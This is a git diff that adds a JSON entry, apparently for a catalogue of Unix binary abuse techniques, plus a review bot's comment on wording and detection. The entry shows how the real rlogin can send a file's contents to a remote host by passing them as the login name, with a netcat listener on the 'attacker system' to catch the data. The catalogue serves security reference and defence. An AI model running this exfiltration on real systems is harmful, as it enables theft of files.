diff --git a/data/rlogin.json b/data/rlogin.json
new file mode 100644
index 0000000..a83a484
--- /dev/null
+++ b/data/rlogin.json
@@ -0,0 +1,11 @@
+{
+ "description": "Usually 'rlogin' is a symlink to 'ssh' the following works only when the real 'rlogin' is used (e.g., from the 'rsh-client' APT package).",
+ "functions": {
+ "file-upload": [
+ {
+ "description": "Send contents of a file to a TCP port. Run 'nc -l -p [port] > [file]' on the attacker system to capture the contents. 'rlogin' hangs waiting for the remote peer to close the socket. The file is corrupted by leading and trailing spurious data.",
+ "code": "rlogin -l \"$(cat [file])\" -p [port] [host]\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
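Review bot: The top-level `description` on the second added line is a run-on and needs a break after 'ssh', e.g. `Usually 'rlogin' is a symlink to 'ssh'; the following works only when the real 'rlogin' is used (e.g., from the 'rsh-client' APT package).` The `file-upload` description should also say that the file content passes through `$(cat [file])` as a command-line argument, so trailing newlines are dropped and NUL bytes cannot be carried. For the same reason the content is visible in the process argument list and in exec audit records, which is where defenders should look for this usage. rlogin traffic is unencrypted, so the content is also readable on the network path. The file ends without a trailing newline; adding one keeps later diffs clean.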